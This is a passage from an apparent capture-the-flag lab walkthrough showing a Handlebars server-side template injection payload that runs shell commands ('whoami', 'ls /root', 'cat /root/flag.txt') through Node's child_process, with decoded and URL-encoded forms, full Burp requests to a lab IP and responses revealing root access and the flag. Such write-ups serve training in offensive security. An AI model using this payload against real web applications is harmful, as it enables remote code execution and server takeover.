d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%7b%7b%2f%77%69%74%68%7d%7d
  
 * When making a request to a web server, the data must be sent in a URL encoded format
   as certain characters NOT from the standard 128 character ASCII set will break
   the output of the page.
    - this means reserved characters that do not belong to this set must be encoded.

BURP > REPEATER
 Request
  ...
  POST / HTTP/1.1
  Host: 10.129.213.190
  Content-Length: 35
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  Origin: http://10.129.213.190
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Referer: http://10.129.213.190/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Connection: close

  email=%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%0a%70%72%6f%63%65%73%73%2e%6d%61%69%6e%4d%6f%64%75%6c%65%2e%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%53%79%6e%63%28%27%77%68%6f%61%6d%69%27%29%3b%22%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%7b%7b%74%68%69%73%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%7b%7b%2f%77%69%74%68%7d%7d&action=Submit
 
 Response
  ...
  <p class="result">
  We will contact you at:    e
  2
  [object Object]
  function Function() { [native code] }
  2
  [object Object]
  root
  </p>
  
  * no error, successful cmd execution
     - from here, a reverse shell can be pushed onto the compromised server
#listing directory
BURP > DECODER
 input:
  {{#with "s" as |string|}}
   {{#with "e"}}
   {{#with split as |conslist|}}
   {{this.pop}}
   {{this.push (lookup string.sub "constructor")}}
   {{this.pop}}
   {{#with string.split as |codelist|}}
   {{this.pop}}
   {{this.push "return process.mainModule.require('child_process').execSync('ls /root');"}}
   {{this.pop}}
   {{#each conslist}}
   {{#with (string.sub.apply 0 codelist)}}
   {{this}}
   {{/with}}
   {{/each}}
   {{/with}}
   {{/with}}
   {{/with}}
  {{/with}}
 
 format: encode as...URL
  %7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%20%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%70%72%6f%63%65%73%73%2e%6d%61%69%6e%4d%6f%64%75%6c%65%2e%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%53%79%6e%63%28%27%6c%73%20%2f%72%6f%6f%74%27%29%3b%22%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%7d%7d%0a%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d
  
 * When making a request to a web server, the data must be sent in a URL encoded format
   as certain characters NOT from the standard 128 character ASCII set will break
   the output of the page.
    - this means reserved characters that do not belong to this set must be encoded.

BURP > REPEATER
 Request
  ...
  POST / HTTP/1.1
  Host: 10.129.213.190
  Content-Length: 35
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  Origin: http://10.129.213.190
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Referer: http://10.129.213.190/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Connection: close

  email=%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%20%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%70%72%6f%63%65%73%73%2e%6d%61%69%6e%4d%6f%64%75%6c%65%2e%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%53%79%6e%63%28%27%6c%73%20%2f%72%6f%6f%74%27%29%3b%22%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%20%20%7b%7b%74%68%69%73%7d%7d%0a%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d&action=Submit
 
 Response
  ...
  <p class="result">
  We will contact you at:    e
  2
  [object Object]
  function Function() { [native code] }
  2
  [object Object]
  Backend
  flag.txt
  snap
  </p>
  
  * no error, successful cmd execution
     - from here, a reverse shell can be pushed onto the compromised server
#flag
BURP > DECODER
 input:
  {{#with "s" as |string|}}
    {{#with "e"}}
    {{#with split as |conslist|}}
    {{this.pop}}
    {{this.push (lookup string.sub "constructor")}}
    {{this.pop}}
    {{#with string.split as |codelist|}}
    {{this.pop}}
    {{this.push "return process.mainModule.require('child_process').execSync('cat /root/flag.txt');"}}
    {{this.pop}}
    {{#each conslist}}
    {{#with (string.sub.apply 0 codelist)}}
    {{this}}
    {{/with}}
    {{/each}}
    {{/with}}
    {{/with}}
    {{/with}}
  {{/with}}
 
 format: encode as...URL
  %7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%70%72%6f%63%65%73%73%2e%6d%61%69%6e%4d%6f%64%75%6c%65%2e%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%53%79%6e%63%28%27%63%61%74%20%2f%72%6f%6f%74%2f%66%6c%61%67%2e%74%78%74%27%29%3b%22%7d%7d%0a%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%20%20%20%7b%7b%74%68%69%73%7d%7d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d
  
 * When making a request to a web server, the data must be sent in a URL encoded format
   as certain characters NOT from the standard 128 character ASCII set will break
   the output of the page.
    - this means reserved characters that do not belong to this set must be encoded.

BURP > REPEATER
 Request
  ...
  POST / HTTP/1.1
  Host: 10.129.213.190
  Content-Length: 35
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  Origin: http://10.129.213.190
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Referer: http://10.129.213.190/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Connection: close

  email=%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%70%72%6f%63%65%73%73%2e%6d%61%69%6e%4d%6f%64%75%6c%65%2e%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%53%79%6e%63%28%27%63%61%74%20%2f%72%6f%6f%74%2f%66%6c%61%67%2e%74%78%74%27%29%3b%22%7d%7d%0a%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%20%20%20%7b%7b%74%68%69%73%7d%7d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d&action=Submit
 
 Response
  ...
  <p class="result">
  We will contact you at:    e
  2
  [object Object]
  function Function() { [native code] }
  2
  [object Object]
  6b258d726d287462d60c103d0142a81c
  </p>
  
  * no error, successful cmd execution
     - from here, a reverse shell can be pushed onto the compromised server

Previous06.IGNITION (DIRECTORY ENUMERATION & BRUTE FORCE)Next08.FUNNEL (PASSWORD SPRAYING & LOCAL PORT FORWARDING)

Last updated 6 months ago